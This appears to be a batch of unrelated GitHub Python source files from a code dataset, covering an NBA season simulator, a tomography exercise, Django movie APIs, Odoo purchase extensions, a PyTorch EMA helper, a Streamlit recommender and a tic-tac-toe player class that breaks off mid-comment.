0\n\t\t\t\telse: # End with the West; the y-intercept for range is 15 (idx 15-29)\n\t\t\t\t\tnc = _SS_TEAMSPERCONF\n\t\t\t\t\n\t\t\t\tfor head in range(0,_SS_TEAMSPERCONF): # Write the header row first\n\t\t\t\t\tif head == 0: # First cell must be 'Team'\n\t\t\t\t\t\tf.write('Team,'+_LSORT[head+nc]+',')\n\t\t\t\t\telif head == 14: # If it's the last one, append a linebreak at the end\n\t\t\t\t\t\tf.write(_LSORT[head+nc]+'\\n')\n\t\t\t\t\telse: # Otherwise, just write the team name\n\t\t\t\t\t\tf.write(_LSORT[head+nc]+',')\n\t\t\t\t\n\t\t\t\tfor rows in range(0,_SS_TEAMSPERCONF):\n\t\t\t\t\tf.write(str(rows+1)+',')\n\t\t\t\t\tfor teams in range(0,15):\n\t\t\t\t\t\tif teams == 14:\n\t\t\t\t\t\t\tf.write('{0:.4f}'.format(((_SEEDPOS[_LSORT[teams+nc]][str(rows+1)]/_SS_SIMCNT)*100))+'%\\n')\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tf.write('{0:.4f}'.format(((_SEEDPOS[_LSORT[teams+nc]][str(rows+1)]/_SS_SIMCNT)*100))+'%,')\n\t\t\t\t\n\t\t\t\tfor wins in range(0,_SS_TEAMSPERCONF):\n\t\t\t\t\tif wins == 0:\n\t\t\t\t\t\tf.write('Wins,'+str(_WINTTL[_LSORT[wins+nc]]/_SS_SIMCNT)+',')\n\t\t\t\t\telif wins == 14:\n\t\t\t\t\t\tf.write(str(_WINTTL[_LSORT[wins+nc]]/_SS_SIMCNT)+'\\n')\n\t\t\t\t\telse:\n\t\t\t\t\t\tf.write(str(_WINTTL[_LSORT[wins+nc]]/_SS_SIMCNT)+',')\n\t\t\t\t\n\t\t\t\tfor max in range(_SS_TEAMSPERCONF):\n\t\t\t\t\tif not max:\n\t\t\t\t\t\ta1 = 'Maxima,'\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\telif max == _SS_TEAMSPERCONF-1:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = '\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\tf.write(a1+str(_MINMAX[_LSORT[max+nc]][1])+a2)\n\t\t\t\t\n\t\t\t\tfor min in range(_SS_TEAMSPERCONF):\n\t\t\t\t\tif not min:\n\t\t\t\t\t\ta1 = 'Minima,'\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\telif min == _SS_TEAMSPERCONF-1:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = '\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\ta1 = ''\n\t\t\t\t\t\ta2 = ','\n\t\t\t\t\tf.write(a1+str(_MINMAX[_LSORT[min+nc]][0])+a2)\n\t\t\t\t\n\t\t\t\tf.write('\\n\\n')\n\texcept PermissionError: # Most likely the file is open, preventing it from being written to. Could also be an attrib error. Because data may have been processing for a while, we give an option to retry.\n\t\tprint('\\nThe file appears to be open on your system!')\n\t\tinput('Hit to attempt a re-write, or to cancel.')\n\t\twriteCsv()\n\t\t\n\n# Starts the program if executing from a file.\nif __name__ == '__main__':\n\ttry: # Attempt to import modules. This needs to be done before we even define constants.\n\t\timport configparser\n\t\timport os\n\t\timport sys\n\t\timport time\n\t\timport pytz\n\t\timport urllib\n\t\timport pandas as pd\n\t\tfrom random import random\n\t\tfrom datetime import datetime, timedelta\n\t\t\n\texcept ImportError as error: # A module is missing? We can't run the program correctly.\n\t\tprint('\\nUnfortunately, you do not yet support this program, as this module is missing:\\n{}'.format(error.name)) # Inform the user of the missing module\n\t\tprint('\\nPlease enter \"pip install {}\" into your shell to run this program!'.format(error.name)) # Suggest the PIP command to install the module\n\t\t\n\t\texit(1)\n\t\n\t_CONFIG = configparser.ConfigParser() # Instantiate the configparser.\n\t\n\t_CFGFILENAME = 'SimSeason.ini' # The name of the config file.\n\t_CFGDATALOAD = False # Has the config file loaded yet?\n\t\n\t_SS_ALLTEAMIDS = ['ATL','BOS','BRK','CHI','CHO','CLE','DAL','DEN','DET','GSW','HOU','IND','LAC','LAL','MEM','MIA','MIL','MIN','NOP','NYK','OKC','ORL','PHI','PHO','POR','SAC','SAS','TOR','UTA','WAS'] # All team IDs\n\t_SS_CONFERENCE = [0,0,0,0,0,0,1,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,0,1,1,1,1,0,1,0] # 0 is Eastern Conference, 1 is Western Conference\n\t_SS_DEFAULTSETTINGKEYS = ['_SS_DATASRC','_SS_DATASRCFN','_SS_EXPORT','_SS_SIMCNT','_SS_DODOWNLD','_SS_SHOWOUTPUT','_SS_SHOWPB','_SS_PBCPROG','_SS_PBCCMPT'] # Default setting keys, in case the config file is nonexistent. Do not change for any reason, or the program will fail.\n\t_SS_DEFAULTSETTINGVALS = ['https://projects.fivethirtyeight.com/nba-model/nba_elo.csv','SimSeasonData.csv','SimSeasonOut.csv',1000,True,True,True,'#',' '] # Default setting values, in case the config file is nonexistent. You can manually change these values to specify defaults.\n\t_SS_DIRNAME = os.path.dirname(__file__)+'\\\\' # The running directory\n\t\n\t_SS_TEAMCOUNT = len(_SS_ALLTEAMIDS) # Constant, the amount of teams\n\t_SS_TEAMSPERCONF = int(int(_SS_TEAMCOUNT)/2) # Constant, the amount of teams per conference.\n\t\n\tsetupConfig() # Pull the config data from the INI file.\n\t\n\tif _SS_SHOWOUTPUT: # Only show the intro text if that option is enabled.\n\t\tinitWelcome() # Begin to inform the user what this program does.\n\t\n\tif _SS_DODOWNLD: # Only download new file if specified.\n\t\tupdateDataSrc() # Download the data source from FiveThirtyEight's servers.\n\telse:\n\t\tif not os.path.exists(_SS_DIRNAME+_SS_DATASRCFN):\n\t\t\tprint('\\nNo data source detected. Set DownloadFile to True in the config!')\n\t\t\texit()\n\t\n\t_CSV = pd.read_csv(_SS_DIRNAME+_SS_DATASRCFN) # Open the data source with Pandas. The argument is specified so we can detect unplayed games (NaNs).\n\t\n\t_FIRSTSIMDAY = datetime.now().strftime('%Y-%m-%d') # Sets the first day to simulate games. If CurrentDay is True, start tomorrow. If CurrentDay is False, start today.\n\t_CSVLINES = len(_CSV['season'].values.tolist()) # The amount of lines in the data source.\n\t_FGSET = False # Stores if the first game index is set.\n\twhile not _FGSET:\n\t\ttry:\n\t\t\t_FGIDXSIMDAY = (_CSV['date'].values.tolist()).index(_FIRSTSIMDAY) # The index of the first game to simulate.\n\t\texcept ValueError:\n\t\t\t_FIRSTSIMDAY = (datetime.now() - timedelta(days=1)).strftime('%Y-%m-%d') # If date is unassignable, attempt to go back a day.\n\t\telse:\n\t\t\t_FGSET = True\n\t\t\t\n\t_FGIDXSSN = (_CSV['season'].values.tolist()).index(_CSV.iloc[(_CSV['date'].values.tolist()).index(_FIRSTSIMDAY)]['season']) # The index of the first game on the season.\n\t_GAMES2SIM = [] # Stores all the games IDs to simulate\n\t_TEAMWINS = dict() # Stores the current and simulate win record of each team\n\t_SEEDPOS = dict() # Stores each seed frequency for every team\n\t_WINTTL = dict() # Stores the total amount of wins for every team across simulations\n\t_MINMAX = dict() # Stores the minima and maxima of win count across all simulations.\n\t\n\tprint('')\n\t\n\tcreateStorage()\n\t\n\tgames2Sim()\n\t\n\tcurrentWinRecords()\n\t\n\tsimulateIndividualSeason()\n\t\n\tblankFile()\t\t\n\t\n\twriteCsv()\n\t\n\tif _SS_SHOWOUTPUT:\n\t\tif _CFGDATALOAD:\n\t\t\tprint('\\nThanks for using {}!'.format(_SS_NAME))\n\t\telse:\n\t\t\tprint('\\nGoodbye!')\n\t\tprint('\\n(C) 2018-19 Darren R. Skidmore')","repo_name":"darrenrs/nbastandings","sub_path":"SimSeason.py","file_name":"SimSeason.py","file_ext":"py","file_size_in_byte":18566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9482987823","text":"__author__ = 'fabian'\n\nimport numpy as np\nimport IPython\nfrom scipy.sparse import dok_matrix\nfrom scipy.sparse.linalg import lsqr\n\ndef makeA(shape, alphas, num_sensor_pixels=None):\n if num_sensor_pixels is None:\n num_sensor_pixels = int(np.ceil(np.sqrt(shape[0]**2 + shape[1]**2)))\n if num_sensor_pixels % 2 == 0:\n num_sensor_pixels += 1\n\n shape_of_a = (shape[0] * shape[1], len(alphas) * num_sensor_pixels)\n a = np.zeros(shape_of_a)\n center_coordinate = ((shape[0] - 1.) / 2., (shape[1] - 1.) / 2.)\n for al, alpha in enumerate(alphas):\n # IPython.embed()\n sensor_vec = np.array([- 1., np.tan((-alpha)/180.*np.pi)])\n sensor_vec /= np.linalg.norm(sensor_vec)\n if alpha == 90:\n sensor_vec = np.array([-1, 0])\n if alpha == 0:\n sensor_vec = np.array([0, -1])\n first_center_coordinate_sensor = center_coordinate - ((num_sensor_pixels - 1.) / 2.) * sensor_vec\n offset = al * num_sensor_pixels\n for y in xrange(shape[1]):\n for x in xrange(shape[0]):\n tmp = np.array([x, y]) - first_center_coordinate_sensor\n proj = np.dot(tmp, sensor_vec)\n lower_sensor_pixel = np.floor(proj)\n upper_sensor_pixel = np.ceil(proj)\n proportion_lower = 1. - proj % 1\n a[x + y * shape[0], offset + lower_sensor_pixel] += proportion_lower\n if upper_sensor_pixel != lower_sensor_pixel:\n proportion_upper = 1. - proportion_lower\n a[x + y * shape[0], offset + upper_sensor_pixel] += proportion_upper\n return a\n\ndef makeA_jens(shape, alphas, num_sensor_pixels=None):\n\n if num_sensor_pixels is None:\n num_sensor_pixels = int(np.ceil(np.sqrt(shape[0]**2 + shape[1]**2)))\n if num_sensor_pixels % 2 == 0:\n num_sensor_pixels += 1\n\n A = np.zeros((shape[0] * shape[1], len(alphas) * num_sensor_pixels))\n\n for al, alpha in enumerate(alphas):\n\n alpha_rad = alpha / 180. * np.pi\n offset = al * num_sensor_pixels\n\n for x in xrange(shape[0]):\n for y in xrange(shape[1]):\n\n proj = np.cos(alpha_rad) * (x - 0.5*(shape[0]-1) - 0.5*(num_sensor_pixels-1)*(0-np.cos(alpha_rad)))\\\n - np.sin(alpha_rad) * (y - 0.5*(shape[1]-1) - 0.5*(num_sensor_pixels-1)*(0+np.sin(alpha_rad)))\n lower_sensor_pixel = np.floor(proj)\n upper_sensor_pixel = np.ceil(proj)\n proportion_lower = 1. - proj % 1\n A[x + y * shape[0], offset + lower_sensor_pixel] += proportion_lower\n if upper_sensor_pixel != lower_sensor_pixel:\n proportion_upper = 1. - proportion_lower\n A[x + y * shape[0], offset + upper_sensor_pixel] += proportion_upper\n\n return A\n\n\n\n\n\nif __name__ == \"__main__\":\n image_y = np.load(\"hs_tomography_2/y_77_.npy\")\n image_alphas = np.load(\"hs_tomography_2/y_77_alphas.npy\").astype(\"float\")\n\n image_flattened = image_y.flatten()\n c = np.array([-77,-33,-12, -3,21,42,50,86]).astype(\"float\")\n\n a = makeA_jens((77,77), image_alphas).transpose()\n\n import matplotlib.pyplot as plt\n plt.imshow(a.transpose(), cmap=\"gray\", interpolation=\"none\")\n plt.close()\n # plt.show()\n a_sparse = dok_matrix(a)\n res = lsqr(a_sparse, image_y)\n res_new = res.reshape((77, 77))\n plt.imshow(res_new, cmap=\"gray\")\n plt.show()\n IPython.embed()\n\n","repo_name":"FabianIsensee/machine_learning_1","sub_path":"ex_5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"18231134038","text":"# Importar string para la generación de letras al azar\nimport string\n# Importar random para los cosos randomxd\nimport random\n\n# Importar mis funcioncitas\nfrom funcs import menu\nfrom funcs import inputver as inv\nfrom funcs import mrrobotto1 as rob\n\n\n# Función para repetir el proceso hasta que el usuario quede satisfecho\ndef repeat():\n lenght, samples = menu.menu()\n\n contras = rob.genos(lenght, samples)\n print(\"Contraseñas generadas:\")\n for i in range(len(contras)):\n print(''.join(x for x in contras[i]))\n \n print(f\"\\n\\n ¿Estás conforme con estos resultados?\")\n flag = inv.scanf(input(f\"(-1 para salir, cualquier otro número para volver a generar) \"))\n\n # Si no está conforme, regenerar\n if flag != -1:\n return repeat()\n\n\n\n# Función Main\nif __name__ == '__main__':\n\n # Presentaciónxd\n print(f\"Hola, te doy la bienvenida a Possegna/Posseñña \\n\\n\")\n\n # Interactuar con el buen usuario\n repeat()\n\n","repo_name":"ErnestoRdS/possegna","sub_path":"possegna.py","file_name":"possegna.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"6072385072","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.response import Response\n# Create your views here.\n\nfrom rest_framework import viewsets\nfrom .serializers import ActorSerializer, MovieSerializer, CategorySerializer\nfrom .models import Actor, Movie, Category\nimport json\nfrom django.http import HttpResponse\n\nclass ActorViewSet(viewsets.ModelViewSet):\n queryset = Actor.objects.all()\n serializer_class = ActorSerializer\n\n\nclass MovieViewSet(viewsets.ModelViewSet):\n queryset = Movie.objects.all()\n serializer_class = MovieSerializer\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\nclass CommonActorsAPIView(APIView):\n serializer_class = MovieSerializer\n\n def get(self, request, *args, **kwargs):\n try:\n movies = request.query_params[\"movies\"]\n if movies != None:\n movies = movies.split(sep=',')\n actors = []\n for movie in movies:\n if Movie.objects.filter(title=movie).exists():\n actors=actors+list(Movie.objects.get(title=movie).cast.values_list())\n else:\n content = {'common_actors': 'at least one movie does not exist'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n result = []\n for actor in actors:\n result.append(Actor.objects.get(pk=actor[0]))\n serializer = ActorSerializer(result, many=True)\n except Exception as e:\n content = {'common_actors': 'movies query parameter does not exist'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(serializer.data,status=status.HTTP_200_OK)\n\n\nclass PerformancesAPIView(APIView):\n serializer_class = ActorSerializer\n def check_together(self,actors,cast):\n actorsinmovie = []\n for actor in cast:\n actorsinmovie.append(actor[0])\n #check if list1 (movie cast) contains all elements in list2 (actors list)\n return all(elem in actorsinmovie for elem in actors)\n \n def get(self, request, *args, **kwargs):\n try:\n actors = request.query_params[\"actors\"]\n if actors != None:\n actors = actors.split(sep=',')\n for actor in actors:\n if Actor.objects.filter(name=actor).exists():\n pass\n else:\n content = {'performance': 'at least one of the actors does not exist'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n #movies that those actors have acted.\n movies = Movie.objects.filter(cast__name__in=actors).distinct()\n #movies that those actors have acted together\n movies_all_actors_appear = []\n for mov in movies:\n cast = list(mov.cast.values_list())\n if(self.check_together(actors,cast)):\n movies_all_actors_appear.append(mov)\n serializer = MovieSerializer(movies_all_actors_appear, many=True)\n except Exception as e:\n content = {'performances': 'actors query parameter is not sent'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n return Response(serializer.data,status=status.HTTP_200_OK)\n\n\ndef actorsname(request,name):\n try:\n actors = Actor.objects.filter(name__icontains=name)\n serializer = ActorSerializer(actors, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n return HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)\n\n\ndef moviestitle(request,title):\n try:\n movies = Movie.objects.filter(title__icontains=title)\n serializer = MovieSerializer(movies, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n \treturn HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)\n\ndef moviescategory(request,category):\n try:\n movies = Movie.objects.filter(category__pk=category)\n serializer = MovieSerializer(movies, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n \treturn HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)\n\n\ndef check_together(actors,cast):\n actors = list(map(int, actors))\n actorsinmovie = []\n for actor in cast:\n actorsinmovie.append(actor[0])\n #check if list1 (movie cast) contains all elements in list2 (actors list)\n return all(elem in actorsinmovie for elem in actors)\n\ndef moviescast(request,cast):\n try:\n actors = cast.split(sep='-')\n for actor in actors:\n if Actor.objects.filter(pk=actor).exists():\n pass\n else:\n content = {'performance': 'at least one of the actors does not exist'}\n dump = json.dumps(content)\n return HttpResponse(dump, status=status.HTTP_400_BAD_REQUEST)\n movies = Movie.objects.filter(cast__pk__in=actors).distinct()\n movies_all_actors_appear = []\n for mov in movies:\n cast = list(mov.cast.values_list())\n if(check_together(actors,cast)):\n movies_all_actors_appear.append(mov)\n serializer = MovieSerializer(movies_all_actors_appear, many=True)\n return HttpResponse(json.dumps(serializer.data), content_type='application/json')\n except Exception as e:\n \treturn HttpResponse(str(e), status=status.HTTP_400_BAD_REQUEST)","repo_name":"miguelmanzan/geekshubs","sub_path":"back/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24828412761","text":"\"\"\"\"\"\"\n\n\nfrom celestine.data import (\n code,\n main,\n scene,\n)\nfrom celestine.session.session import SuperSession\nfrom celestine.typed import (\n H,\n N,\n R,\n S,\n)\nfrom celestine.window.container import View\n\n\nclass Session(SuperSession):\n \"\"\"\"\"\"\n\n\n@code\ndef cow(*, say: S, hold: H, **star: R) -> N:\n \"\"\"\"\"\"\n talk = hold.language.DEMO_COW_TALK\n print(talk, say)\n\n\n@main\ndef zero(view: View) -> N:\n \"\"\"\"\"\"\n language = view.hold.language\n with view.span(\"zero_head\") as line:\n line.new(\"zero_title\", text=language.DEMO_ZERO_TITLE)\n line.new(\n \"zero_A\",\n text=language.DEMO_ZERO_ACTION,\n code=\"cow\",\n say=language.DEMO_ZERO_SAY,\n )\n with view.span(\"zero_body\") as line:\n line.new(\"zero_past\", text=language.DEMO_MAIN_PAST, view=\"one\")\n line.new(\"zero_next\", text=language.DEMO_MAIN_NEXT, view=\"two\")\n\n\n@scene\ndef one(view: View) -> N:\n \"\"\"\"\"\"\n language = view.hold.language\n with view.span(\"one_head\") as line:\n line.new(\"one_title\", text=language.DEMO_ONE_TITLE)\n line.new(\n \"one_A\",\n text=language.DEMO_ONE_ACTION,\n code=\"cow\",\n say=language.DEMO_ONE_SAY,\n )\n with view.span(\"one_body\") as line:\n line.new(\"one_past\", text=language.DEMO_ONE_PAST, view=\"zero\")\n line.new(\"one_next\", text=language.DEMO_ONE_NEXT, view=\"two\")\n\n\n@scene\ndef two(view: View) -> N:\n \"\"\"\"\"\"\n language = view.hold.language\n with view.span(\"two_head\") as line:\n line.new(\"two_title\", text=language.DEMO_TWO_TITLE)\n line.new(\n \"two_A\",\n text=language.DEMO_TWO_ACTION,\n code=\"cow\",\n say=language.DEMO_TWO_SAY,\n )\n with view.span(\"two_body\") as line:\n line.new(\"two_past\", text=language.DEMO_TWO_PAST, view=\"one\")\n line.new(\"two_next\", text=language.DEMO_TWO_NEXT, view=\"zero\")\n\n\n# if __spec__.name == \"__main__\":\n# celestine.main(__spec__.origin)\n","repo_name":"mem-dixy/celestine","sub_path":"celestine/application/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"23433758129","text":"from odoo import fields, models, api, _\n\n\nclass PurchaseOrder(models.Model):\n _inherit = \"purchase.order\"\n \n sale_order_id = fields.Many2many(\n 'sale.order',\n string = 'Sale Orders',\n #compute = \"_compute_sale_orders\",\n readonly = False,\n )\n\n sale_orders_counted = fields.Integer(\n \"Sale Order Count\",\n compute='_compute_sale_orders_counted',)\n \n @api.depends(\"sale_order_id\")\n def _compute_sale_orders_counted(self):\n for purchase in self:\n purchase.sale_orders_counted = len(purchase.sale_order_id)\n\n \"\"\"@api.depends('order_line.sale_order_id','sale_order_id') \n def _compute_sale_orders(self):\n for purchase in self:\n purchase.sale_order_id = [(4, False)]\n #search for purchases that reference the sale\n import pdb;pdb.set_trace()\n domain = ['|',('id','in',purchase.order_line.sale_order_id.ids)]\n domain += [('id','in',purchase.sale_order_id.ids)]\n domain += [('company_id','=',purchase.company_id.id)]\n sale_ids = self.env['sale.order'].search(domain)\n purchase.sale_order_id = [(6, 0, sale_ids.ids)]\"\"\"\n \n def action_view_sale_orders(self):\n self.ensure_one()\n # Force active_id to avoid issues when coming from smart buttons\n # in other models\n sale_order_ids = self.sale_order_id.ids\n action = {\n 'res_model': 'sale.order',\n 'type': 'ir.actions.act_window',\n }\n if len(sale_order_ids) == 1:\n action.update({\n 'view_mode': 'form',\n 'res_id': sale_order_ids[0],\n })\n else:\n action.update({\n 'name': _('Sources Sale Orders %s', self.name),\n 'domain': [('id', 'in', sale_order_ids)],\n 'view_mode': 'tree,form',\n })\n return action\n\n def copy_data(self, default=None):\n if default is None:\n default = {}\n default[\"order_line\"] = [\n (0, 0, line.copy_data()[0])\n for line in self.order_line.filtered(lambda l: not l.is_deposit)\n ]\n return super(PurchaseOrder, self).copy_data(default)\n\n @api.model\n def create(self, values): \n if 'origin' in values and isinstance(values['origin'],str):\n # Checking first if this comes from a 'sale.order'\n sale_id = self.env['sale.order'].search([\n ('name', '=', values['origin'])\n ], limit=1)\n if sale_id:\n values['sale_order_id'] = [(4,sale_id.id)]\n if sale_id.client_order_ref:\n values['origin'] = sale_id.client_order_ref\n else:\n # Checking if this production comes from a route.\n # If from route, find procurement and get the sale_id from there\n source_docs = values['origin'].split(',')\n procure_id = self.env['procurement.group'].search([\n ('name', 'in', source_docs)\n ])\n # If so, use the 'sale_id' from the parent production\n sale_id = procure_id and procure_id.sale_id\n sale_id = sale_id and sale_id.id or None\n if sale_id:\n values['sale_order_id'] = [(4,sale_id.id)]\n if sale_id.client_order_ref:\n values['origin'] = sale_id.client_order_ref\n\n return super(PurchaseOrder, self).create(values)\n\nclass PurchaseOrderLine(models.Model):\n _inherit = \"purchase.order.line\"\n\n is_deposit = fields.Boolean(\n string=\"Is a deposit payment\",\n help=\"Deposit payments are made when creating invoices from a purhcase\"\n \" order. They are not copied when duplicating a purchase order.\",\n )\n sale_order_id = fields.Many2one(\n related='sale_line_id.order_id', \n string=\"Sale Order\", \n store=True, readonly=True)\n \n sale_line_id = fields.Many2one(\n 'sale.order.line', \n string=\"Origin Sale Item\", \n index=True, copy=False)\n \n def _prepare_account_move_line(self, move):\n res = super(PurchaseOrderLine, self)._prepare_account_move_line(move)\n if self.is_deposit:\n res[\"quantity\"] = -1 * self.qty_invoiced\n return res\n","repo_name":"ecgroupca/ECGroup","sub_path":"purchase_deposit/models/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"70151367450","text":"# Import libraries\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\nfrom scipy.sparse import csr_matrix\nimport streamlit as st\n\n# Load the dataset\nmovies = pd.read_csv(\"movies_metadata.csv\",low_memory=False)\n\n# Drop the rows with missing values\nmovies.dropna(inplace=True)\n\n# Extract the overview column\noverviews = movies[\"overview\"]\n\n# Create a TF-IDF vectorizer object\ntfidf = TfidfVectorizer(stop_words=\"english\")\n\n# Fit and transform the overviews\ntfidf_matrix = tfidf.fit_transform(overviews)\n\n# Compute the cosine similarity matrix for content-based filtering\ncosine_sim_content = linear_kernel(tfidf_matrix, tfidf_matrix)\n\n# Create a pivot table of ratings for collaborative filtering\nratings = pd.read_csv(\"ratings_small.csv\")\nratings_pivot = ratings.pivot(index=\"movieId\", columns=\"userId\", values=\"rating\").fillna(0)\nratings_matrix = csr_matrix(ratings_pivot.values)\n\n# Compute the cosine similarity matrix for collaborative filtering\ncosine_sim_collab = linear_kernel(ratings_matrix, ratings_matrix)\n\n# Create a function to get the title from the index\ndef get_title(index):\n return movies[movies.index == index][\"title\"].values[0]\n\n# Create a function to get the index from the title\ndef get_index(title):\n return movies[movies.title == title].index.values[0]\n\n# Create a function to get the movieId from the title\ndef get_movieId(title):\n return movies[movies.title == title][\"id\"].values[0]\n\n# Create a function to get the recommendations based on the title and the hybrid method\ndef get_recommendations(title, method):\n # Get the index and movieId of the movie\n index = get_index(title)\n movieId = get_movieId(title)\n # Get the similarity scores of all movies with that movie based on the method\n if method == \"content\":\n sim_scores = list(enumerate(cosine_sim_content[index]))\n elif method == \"collab\":\n sim_scores = list(enumerate(cosine_sim_collab[movieId]))\n elif method == \"hybrid\":\n sim_scores = list(enumerate(cosine_sim_content[index] + cosine_sim_collab[movieId]))\n # Sort the movies based on the similarity scores\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n # Get the indices of the 10 most similar movies\n sim_indices = [i[0] for i in sim_scores[1:11]]\n # Get the titles of the 10 most similar movies\n sim_titles = [get_title(i) for i in sim_indices]\n # Return the titles\n return sim_titles\n\n# Create a streamlit app\nst.title(\"Movie Recommendation System\")\n\n# Ask the user for a movie title\nuser_input = st.text_input(\"Enter a movie title:\")\n\n# Ask the user for a recommendation method\nuser_method = st.selectbox(\"Select a recommendation method:\", [\"content\", \"collab\", \"hybrid\"])\n\n# Check if the user input is valid\nif user_input in movies[\"title\"].values:\n # Get the recommendations\n recommendations = get_recommendations(user_input, user_method)\n # Display the recommendations\n st.write(f\"Here are 10 movies that are similar to {user_input} using {user_method} method:\")\n for movie in recommendations:\n st.write(movie)\nelse:\n # Display an error message\n st.write(\"Invalid input. Please enter a valid movie title.\")\n","repo_name":"Saurabhh0711/Movie-Recemmondation-System","sub_path":"movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34981258241","text":"from logging import getLogger\n\nfrom torch import nn\n\n\nclass EMA(object):\n \"\"\"Exponential moving average of model parameters.\n\n Ref\n - https://github.com/tensorflow/addons/blob/v0.10.0/tensorflow_addons/optimizers/moving_average.py#L26-L103\n - https://anmoljoshi.com/Pytorch-Dicussions/\n\n Args:\n model (nn.Module): Model with parameters whose EMA will be kept.\n decay (float): Decay rate for exponential moving average.\n strict (bool): Apply strict check for `assign` & `resume`.\n use_dynamic_decay (bool): Dynamically change decay rate. If `True`, small decay rate is\n used at the beginning of training to move moving average faster.\n \"\"\" # NOQA\n\n def __init__(\n self,\n model: nn.Module,\n decay: float,\n strict: bool = True,\n use_dynamic_decay: bool = True,\n ):\n self.decay = decay\n self.model = model\n self.strict = strict\n self.use_dynamic_decay = use_dynamic_decay\n self.logger = getLogger(__name__)\n self.n_step = 0\n\n self.shadow = {}\n self.original = {}\n\n # Flag to manage which parameter is assigned.\n # When `False`, original model's parameter is used.\n # When `True` (`assign` method is called), `shadow` parameter (ema param) is used.\n self._assigned = False\n\n # Register model parameters\n for name, param in model.named_parameters():\n if param.requires_grad:\n self.shadow[name] = param.data.clone()\n\n def step(self):\n self.n_step += 1\n if self.use_dynamic_decay:\n _n_step = float(self.n_step)\n decay = min(self.decay, (1.0 + _n_step) / (10.0 + _n_step))\n else:\n decay = self.decay\n\n for name, param in self.model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n new_average = (1.0 - decay) * param.data + decay * self.shadow[name]\n self.shadow[name] = new_average.clone()\n\n # alias\n __call__ = step\n\n def assign(self):\n \"\"\"Assign exponential moving average of parameter values to the respective parameters.\"\"\"\n if self._assigned:\n if self.strict:\n raise ValueError(\"[ERROR] `assign` is called again before `resume`.\")\n else:\n self.logger.warning(\n \"`assign` is called again before `resume`.\"\n \"shadow parameter is already assigned, skip.\"\n )\n return\n\n for name, param in self.model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n self.original[name] = param.data.clone()\n param.data = self.shadow[name]\n self._assigned = True\n\n def resume(self):\n \"\"\"Restore original parameters to a model.\n\n That is, put back the values that were in each parameter at the last call to `assign`.\n \"\"\"\n if not self._assigned:\n if self.strict:\n raise ValueError(\"[ERROR] `resume` is called before `assign`.\")\n else:\n self.logger.warning(\"`resume` is called before `assign`, skip.\")\n return\n\n for name, param in self.model.named_parameters():\n if param.requires_grad:\n assert name in self.shadow\n param.data = self.original[name]\n self._assigned = False\n","repo_name":"pfnet-research/kaggle-lyft-motion-prediction-4th-place-solution","sub_path":"src/lib/training/exponential_moving_average.py","file_name":"exponential_moving_average.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"31"} +{"seq_id":"13456830582","text":"import math\nimport random\n\n# hem bilgisyar hem de kullanıcıyı tanımlayan bir oyuncu üst sınıfı\nclass Player():\n def __init__(self, letter):\n self.letter = letter\n \n def get_move(self, game):\n pass\n\nclass RandomComputerPlayer(Player):\n def __init__(self, letter):\n # değişiklik yapmak isteyebiliriz. o yüzden init tanımlayalım nolur nolmaz\n super().__init__(letter)\n\n def get_move(self, game):\n choice = random.choice(game.available_moves())\n return choice\n\nclass HumanPlayer(Player):\n def __init__(self, letter):\n super().__init__(letter)\n\n def get_move(self, game):\n valid_choice = False\n val = None\n while not valid_choice:\n choice = input(self.letter + '\\'s turn. Input move (0-8): ')\n try:\n val = int(choice)\n if val not in game.available_moves():\n raise ValueError\n valid_choice = True\n except ValueError:\n print('Invalid choice. Try again.')\n return val\n\n# burada tanımladığımız RandomComputerPlayer sadece rastgele hamleler yapıyor ve genelde\n# kaybediyor. bunu önlemek için minimax adı verilen bir algoritma kullanarak bilgisayarın 